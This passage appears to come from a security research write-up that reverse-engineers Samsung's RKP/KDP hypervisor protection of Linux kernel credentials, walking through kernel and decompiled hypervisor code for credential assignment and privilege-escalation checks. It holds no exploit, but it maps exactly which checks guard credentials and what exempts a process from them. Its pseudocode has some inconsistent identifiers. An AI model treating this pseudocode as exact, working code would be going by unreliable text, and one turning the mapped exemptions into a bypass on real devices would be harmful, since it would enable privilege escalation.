asmlinkage __visible void __init start_kernel(void)
{
    // ...
    if (rkp_cred_enable)
        kdp_init();
    cred_init();
    // ...
}

On the hypervisor side, the command is handled in rkp_cmd_cred_init, which calls rkp_cred_init.

int64_t rkp_cmd_cred_init(saved_regs_t* regs) {
  uh_log('L', "rkp.c", 399, "KDP_KDP About to call cred_init   ");
  rkp_cred_init(regs);
  return 0;
}

void rkp_cred_init(saved_regs_t* regs) {
  // ...

  rkp_cred = malloc(0xF0, 0);
  cred = rkp_get_pa(regs->x2);
  if (cred_inited == 1) {
    uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
    return;
  }
  cred_inited = 1;
  credSize = cred->credSize;
  sp_size = cred->sp_size;
  uid_cred = cred->uid_cred;
  euid_cred = cred->euid_cred;
  gid_cred = cred->gid_cred;
  egid_cred = cred->egid_cred;
  usage_cred = cred->usage_cred;
  bp_pgd_cred = cred->bp_pgd_cred;
  bp_task_cred = cred->bp_task_cred;
  type_cred = cred->type_cred;
  security_cred = cred->security_cred;
  bp_cred_secptr = cred->bp_cred_secptr;
  if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
      usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
      security_cred > credSize || bp_cred_secptr > sp_size) {
    uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
    return;
  }
  rkp_cred->CRED_SIZE = cred->credSize;
  rkp_cred->SP_SIZE = sp_size;
  rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
  rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
  rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
  rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
  rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
  rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
  rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
  rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
  rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
  rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
  rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
  rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
  rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
  rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
  rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
  rkp_cred->CRED_USE_CNT = usage_cred >> 3;
  rkp_cred->VERIFIED_BOOT_STATE = 0;
  vbs_va = cred->verifiedbootstate;
  if (vbs_va) {
    vbs_pa = check_and_convert_kernel_input(vbs_va);
    if (vbs_pa != 0) {
      rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
    }
  }
  rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
  rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
  uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}

rkp_cred_init does the following:

it allocates a structure rkp_cred that will contains all the offsets;
it does some basic sanity checking on the various offsets;
it stores the various offsets into this rkp_cred structure;
it also checks if the device is unlocked (verifiedbootstate is "orange");
it saves the address of ss_initialized (is SELinux initialized);

PGD Assignment

When the kernel wants to update the PGD of a struct task_struct, it calls RKP to also update the back pointer in the struct cred. On the kernel side, this mainly happens when a process is being copied.

// from fs/exec.c
static int exec_mmap(struct mm_struct *mm)
{
  // ...
    if(rkp_cred_enable){
    uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
    }
  // ...
}

// from kernel/fork.c
void rkp_assign_pgd(struct task_struct *p)
{
    u64 pgd;
    pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);

    uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}

static __latent_entropy struct task_struct *copy_process(
                    unsigned long clone_flags,
                    unsigned long stack_start,
                    unsigned long stack_size,
                    int __user *child_tidptr,
                    struct pid *pid,
                    int trace,
                    unsigned long tls,
                    int node)
{
  // ...
    if(rkp_cred_enable)
        rkp_assign_pgd(p);
  // ...
}

rkp_cmd_pgd_assign calls rkp_pgd_assign.

int64_t rkp_cmd_pgd_assign(saved_regs_t* regs) {
  rkp_pgd_assign(regs);
  return 0;
}

int64_t rkp_phys_map_verify_cred(uint64_t cred) {
  // ...

  if (!cred)
    return 1;
  if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE)
    return 1;
  rkp_phys_map_lock(cred);
  if (is_phys_map_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
    rkp_phys_map_unlock(cred);
    return 1;
  }
  rkp_phys_map_unlock(cred);
  return 0;
}

void rkp_pgd_assign(saved_regs_t* regs) {
  // ...

  cred = rkp_get_pa(regs->x2);
  pgd = regs->x3;
  if (rkp_phys_map_verify_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !!  %lx %lx %lx", cred, regs->x2, pgd);
    return;
  }
  *(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}

rkp_pgd_assign will check if the struct cred is needed marked as CRED in the physmap, before making the update of the bp_pgd field of the struct cred.

Security Change

Similarly to the previous command, when the kernel needs to change the security field of the struct cred, it will call RKP. This happens when the struct cred is being freed.

// from security/selinux/hooks.c
int rkp_from_tsec_jar(unsigned long addr)
{
    static void *objp;
    static struct kmem_cache *s;
    static struct page *page;

    objp = (void *)addr;

    if(!objp)
        return 0;

    page = virt_to_head_page(objp);
    s = page->slab_cache;
    if(s && s->name) {
        if(!strcmp(s->name,"tsec_jar")) {
            return 1;
        }
    }
    return 0;
}
int chk_invalid_kern_ptr(u64 tsec)
{
    return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}
void rkp_free_security(unsigned long tsec)
{
    if(!tsec ||
        chk_invalid_kern_ptr(tsec))
        return;

    if(rkp_ro_page(tsec) &&
        rkp_from_tsec_jar(tsec)){
        kmem_cache_free(tsec_jar,(void *)tsec);
    }
    else {
        kfree((void *)tsec);
    }
}

static void selinux_cred_free(struct cred *cred)
{
  // ...
    if (rkp_ro_page((unsigned long)cred)) {
        uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
    }
  // ...
    rkp_free_security((unsigned long)tsec);
  // ...
}

rkp_cmd_cred_set_security calls rkp_cred_set_security.

int64_t rkp_cmd_cred_set_security(saved_regs_t* regs) {
  rkp_cred_set_security(regs);
  return 0;
}

int64_t* rkp_cred_set_security(saved_regs_t* regs) {
  // ...

  cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
  if (is_phys_map_cred(cred))
    return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
                  regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
  security = rkp_get_pa(regs->x2);
  *security = 7;
  return security;
}

rkp_cred_set_security checks if the address it was given indeed being to struct cred (marked as CRED in the physmap), before setting the security field of the struct cred to 7 (poison value).

Process Marking

When a process is making an execve syscall, checking extra is performed.

// from fs/exec.c
#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)
#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)

#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
            x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
            x->cred->suid.val == 0 || x->cred->sgid.val == 0)

static int rkp_restrict_fork(struct filename *path)
{
    struct cred *shellcred;

    if (!strcmp(path->name, "/system/bin/patchoat") ||
        !strcmp(path->name, "/system/bin/idmap2")) {
        return 0;
    }
        /* If the Process is from Linux on Dex, 
        then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
    if(rkp_is_lod(current)){
            return 0;
        }
#endif
    if(rkp_is_nonroot(current)){
        shellcred = prepare_creds();
        if (!shellcred) {
            return 1;
        }
        shellcred->uid.val = 2000;
        shellcred->gid.val = 2000;
        shellcred->euid.val = 2000;
        shellcred->egid.val = 2000;

        commit_creds(shellcred);
    }
    return 0;
}

SYSCALL_DEFINE3(execve,
        const char __user *, filename,
        const char __user *const __user *, argv,
        const char __user *const __user *, envp)
{
    struct filename *path = getname(filename);
    int error = PTR_ERR(path);

    if(IS_ERR(path))
        return error;

    if(rkp_cred_enable){
        uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
    }

    if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
        if(rkp_restrict_fork(path)){
            pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
                            "PPID = %d(%s)\n",
            current->pid, current->comm,
            current->parent->pid, current->parent->comm);
            putname(path);
            return -EACCES;
        }
    }
    putname(path);
  return do_execve(getname(filename), argv, envp);
}

The kernel will call RKP, passing it the executable path, to flag the process by setting the type field of the struct cred. It also calls rkp_restrict_fork if the current task executes as root.

rkp_restrict_fork does the following:

if the execved binary is patchoat or idmap2, allow it;
if the process originates from Linux on DeX, allow it;
if the current process is flagged as non-root, it assigns it the credentials of the shell user.

On the hypervisor side, rkp_cmd_mark_ppt calls rkp_mark_ppt.

int64_t rkp_cmd_mark_ppt(saved_regs_t* regs) {
  rkp_mark_ppt(regs);
  return 0;
}

void rkp_mark_ppt(saved_regs_t* regs) {
  // ...

  current_va = rkp_ns_get_current();
  current_pa = rkp_get_pa(current_va);
  current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
  name_va = regs->x2;
  name_pa = rkp_get_pa(name_va);
  if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
    uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
  }
  if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
      !strcmp(name_pa, "/system/bin/app_process64")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
  }
  if (!strcmp(name_pa, "/system/bin/nst"))
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
  if (!strcmp(name_pa, "/system/bin/idmap2"))
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  if (!strcmp(name_pa, "/system/bin/patchoat"))
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}

rkp_mark_ppt does the following:

it does some sanity checking on the arguments;
if the executable is adbd, app_process32 or app_process64;
it sets the flag CRED_FLAG_MARK_PPT (4).
if the executable is nst;
it sets the flag CRED_FLAG_LOD (8, checked by rkp_is_lod).
if the executable is idmap2 or patchoat;
it unsets the flag CRED_FLAG_CHILD_PPT (2, checked by rkp_is_nonroot).

Credentials Assignment

This command is the heart of KDP. It is called when the kernel needs to assign a struct cred to a struct task_struct and does extensive checking to detect privilege escalations.

On the kernel side, copy_creds, commit_creds and override_creds will call prepare_ro_creds instead of simply setting the cred field of the struct task_struct.

prepare_ro_creds does the following:

it allocates a read-only struct cred;
it allocates a structure for the "use counter";
it allcoates a read-only struct task_security_struct;
it gives these 3 structures and the read-write struct cred that the kernel wanted to assign to RKP;
RKP verifies the values, and copies the data from the RW to the RO struct cred;
prepare_ro_creds returns the RO struct cred which gets assigned.

// from include/linux/cred.h
typedef struct cred_param{
    struct cred *cred;
    struct cred *cred_ro;
    void *use_cnt_ptr;
    void *sec_ptr;
    unsigned long type;
    union {
        void *task_ptr;
        u64 use_cnt;
    };
}cred_param_t;

enum {
    RKP_CMD_COPY_CREDS = 0,
    RKP_CMD_CMMIT_CREDS,
    RKP_CMD_OVRD_CREDS,
};
#define override_creds(x) rkp_override_creds(&x)

#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do {                        \
    cred_param.cred = crd;      \
    cred_param.cred_ro = crd_ro;        \
    cred_param.use_cnt_ptr = uptr;      \
    cred_param.sec_ptr= tsec;       \
    cred_param.type = rkp_cmd_type;     \
    cred_param.use_cnt = (u64)rkp_use_cnt;      \
} while(0)

// from kernel/cred.c
static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
    u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
    struct cred *new_ro;
    void *use_cnt_ptr = NULL;
    void *rcu_ptr = NULL;
    void *tsec = NULL;
    cred_param_t cred_param;
    new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
    if (!new_ro)
        panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);

    use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
    if (!use_cnt_ptr)
        panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);

    rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
    ((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;

    tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
    if (!tsec)
        panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);

    rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
    uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
    if (kdp_cmd == RKP_CMD_COPY_CREDS) {
        if ((new_ro->bp_task != (void *)p)
            || new_ro->security != tsec
            || new_ro->use_cnt != use_cnt_ptr) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
        }
    }
    else {
        if ((new_ro->bp_task != current)||
            (current->mm
            && new_ro->bp_pgd != (void *)pgd) ||
            (new_ro->security != tsec) ||
            (new_ro->use_cnt != use_cnt_ptr)) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
        }
    }

    rocred_uc_set(new_ro, 2);

    set_cred_subscribers(new_ro, 0);
    get_group_info(new_ro->group_info);
    get_uid(new_ro->user);
    get_user_ns(new_ro->user_ns);

#ifdef CONFIG_KEYS
    key_get(new_ro->session_keyring);
    key_get(new_ro->process_keyring);
    key_get(new_ro->thread_keyring);
    key_get(new_ro->request_key_auth);
#endif

    validate_creds(new_ro);
    return new_ro;
}

int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
  // ...
    /*
     * Disabling cred sharing among the same thread group. This
     * is needed because we only added one back pointer in cred.
     *
     * This should NOT in any way change kernel logic, if we think about what
     * happens when a thread needs to change its credentials: it will just
     * create a new one, while all other threads in the same thread group still
     * reference the old one, whose reference counter decreases by 2.
     */
    if(!rkp_cred_enable){
  // ...
    }
  // ...
    if(rkp_cred_enable){
        p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
        put_cred(new);
    }
    else {
        p->cred = p->real_cred = get_cred(new);
        alter_cred_subscribers(new, 2);
        validate_creds(new);
    }
  // ...
}

int commit_creds(struct cred *new)
{

    if (rkp_ro_page((unsigned long)new))
        BUG_ON((rocred_uc_read(new)) < 1);
    else
  // ...
    if(rkp_cred_enable) {
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);

        rcu_assign_pointer(task->real_cred, new_ro);
        rcu_assign_pointer(task->cred, new_ro);
    }
    else {
        rcu_assign_pointer(task->real_cred, new);
        rcu_assign_pointer(task->cred, new);
    }
  // ...
    if (rkp_cred_enable){
        put_cred(new);
        put_cred(new);
    }
  // ...
}

const struct cred *rkp_override_creds(struct cred **cnew)
{
  // ...
    struct cred *new = *cnew;
  // ...
    if(rkp_cred_enable) {
        volatile unsigned int rkp_use_count = rkp_get_usecount(new);
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
        *cnew = new_ro;
        rcu_assign_pointer(current->cred, new_ro);
        put_cred(new);
    }
    else {
        get_cred(new);
        alter_cred_subscribers(new, 1);
        rcu_assign_pointer(current->cred, new);
    }
  // ...
}

On the hypervisor side, rkp_cmd_assign_creds calls rkp_assign_creds.

int64_t rkp_cmd_assign_creds(saved_regs_t* regs) {
  rkp_assign_creds(regs);
  return 0;
}

uint64_t rkp_ns_get_current() {
  if (get_sp_sel())
    return get_sp_el0();
  return get_sp();
}

int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  return curr_id > 1000 && targ_id <= 1000;
}

bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
  // ..

  curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  if (check_pe_id(targ_uid, curr_uid))
    return 1;
  curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  if (check_pe_id(targ_gid, curr_gid))
    return 1;
  curr_ueid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid))
    return 1;
  curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid))
    return 1;
  return 0;
}

int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
  // ...

  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  if ((curr_flags & 2) != 0)
    return 1;
  task = curr_task;
  while (1) {
    task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
    if (!task_pid)
      return 0;
    task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
    memcpy(comm, task_comm, sizeof(comm));
    if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd"))
      return 1;
    parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    task = parent_pa = rkp_get_pa(parent_va);
  }
}

int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
  uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}

bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
  return ((curr_id - 0x61A80000) <= 0xFFFF && (targ_id - 0x61A80000) > 0xFFFF && targ_id != -1);
}

int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
  rkp_phys_map_lock(sec_ptr);
  if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
      sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
    uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
           sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
    rkp_phys_map_unlock(sec_ptr);
    return 1;
  }
  rkp_phys_map_unlock(sec_ptr);
  return 0;
}

void rkp_assign_creds(saved_regs_t* regs) {
  // ...

  cred_param = rkp_get_pa(regs->x2);
  if (!cred_param) {
    uh_log('L', "rkp_kdp.c", 662, "NULL pData");
    return;
  }
  curr_task_va = rkp_ns_get_current();
  curr_task = rkp_get_pa(curr_task_va);
  curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
  curr_cred = rkp_get_pa(curr_cred_va);
  targ_cred = rkp_get_pa(cred_param->cred);
  targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
  curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
  curr_secptr = rkp_get_pa(curr_secptr_va);
  if (!curr_cred) {
    uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
  }
  if (!curr_secptr && rkp_deferred_inited) {
    uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL  %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
  }
  bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
  bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
  if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
    uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1  %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
    uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
    rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
    return;
  }
  if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
    uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
    return;
  }
  skip_checks = 0;
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  if ((curr_flags & 8) == 0) {
    curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
    curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
    curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
    curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
    if ((curr_uid & 0xFFFF0000) != 0x61A80000 && (curr_euid & 0xFFFF0000) != 0x61A80000 &&
        (curr_gid & 0xFFFF0000) != 0x61A80000 && (curr_egid & 0xFFFF0000) != 0x61A80000) {
      if (!rkp_cred->VERIFIED_BOOT_STATE) {
        if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
          uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
                 *(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
          return rkp_privilege_escalation(targ_cred, cred_pa, 1);
        }
      }
      skip_checks = 1;
    } else {
      *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
    }
  }
  if (!skip_checks) {
    targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
    priv_esc = 0;
    if (targ_uid != 3003) {
      curr_uid = *(cred_pa + 4 * rkp_cred->CRED_UID_OFFSET);
      priv_esc = 0;
      if (check_privilege_escalation(targ_uid, curr_uid)) {
        uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
               targ_uid);
        priv_esc = 1;
      }
    }
    targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
    if (targ_euid != 3003) {
      curr_euid = *(cred_pa + 4 * rkp_cred->CRED_EUID_OFFSET);
      if (check_privilege_escalation(targ_euid, curr_euid)) {
        uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
               targ_euid);
        priv_esc = 1;
      }
    }
    targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
    if (targ_gid != 3003) {
      curr_gid = *(cred_pa + 4 * rkp_cred->CRED_GID_OFFSET);
      if (check_privilege_escalation(targ_gid, curr_gid)) {
        uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
               targ_gid);
        priv_esc = 1;
      }
    }
    targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
    if (targ_egid != 3003) {
      curr_egid = *(cred_pa + 4 * rkp_cred->CRED_EGID_OFFSET);
      if (check_privilege_escalation(targ_egid, curr_egid)) {
        uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
               targ_egid);
        priv_esc = 1;
      }
    }
    if (priv_esc) {
      uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx  ", targ_cred);
      if (curr_task) {
        curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
        uh_log('L', "rkp_kdp.c", 707, curr_comm);
      }
      return rkp_privilege_escalation(param_cred_pa, cred_pa, 1);
    }
  }
  memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
  cmd_type = cred_param->type;
  *(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
  if (cmd_type != RKP_CMD_COPY_CREDS) {
    curr_mm_va = *(current_pa + 8 * rkp_cred->TASK_MM_OFFSET);
    if (curr_mm_va) {
      curr_mm = rkp_get_pa(curr_mm_va);
      curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
    } else {
      curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xFFFFFFFFC000);
    }
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
    if (cmd_type == RKP_CMD_OVRD_CREDS) {
      if (cred_param->use_cnt <= 1)
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
      else
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
    }
  } else {
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
  }
  sec_ptr_va = cred_param->sec_ptr;
  cred_ro_va = cred_param->cred_ro;
  if (sec_ptr_va) {
    sec_ptr = rkp_get_pa(sec_ptr_va);
    targ_secptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
    targ_secptr = rkp_get_pa(targ_secptr);
    if (chk_invalid_sec_ptr(sec_ptr) || !targ_secptr || !curr_secptr) {
      uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", sec_ptr_va, sec_ptr,
             targ_secptr);
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", sec_ptr_va, targ_secptr, curr_secptr);
    } else {
      curr_sid = *(curr_secptr + 4);
      targ_sid = *(targ_secptr + 4);
      if (rkp_deferred_inited && targ_sid <= 19 && curr_sid >= 21) {
        uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", targ_sid, curr_sid);
        rkp_policy_violation("Data Protection Violation %lx %lx %lx", targ_sid, curr_sid, 0);
      } else {
        memcpy(sec_ptr, targ_secptr, rkp_cred->SP_SIZE);
        *(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = sec_ptr_va;
        *(sec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = cred_ro_va;
      }
    }
  } else {
    uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
    rkp_policy_violation("Data Protection Violation", 0, 0, 0);
  }
  if (rkp_cred->VERIFIED_BOOT_STATE)
    return;
  targ_flags = *(targ_cred_ro + 8 * rkp_creds->CRED_FLAGS_OFFSET);
  if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
    parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    parent_task = rkp_get_pa(parent_task_va);
    parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
    parent_cred = rkp_get_pa(parent_cred_va);
    parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
    if ((parent_flags & CRED_FLAG_MARK_PPT) != 0)
      *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
  }
}

rkp_assign_creds does the following:

it gets the current task_struct by getting SP_EL0;
- this is what the kernel does when using current;
- (see arch/arm64/include/asm/current.h).
it does some sanity checking on the arguments;
it checks if the back pointer of the current struct task_struct is correct;
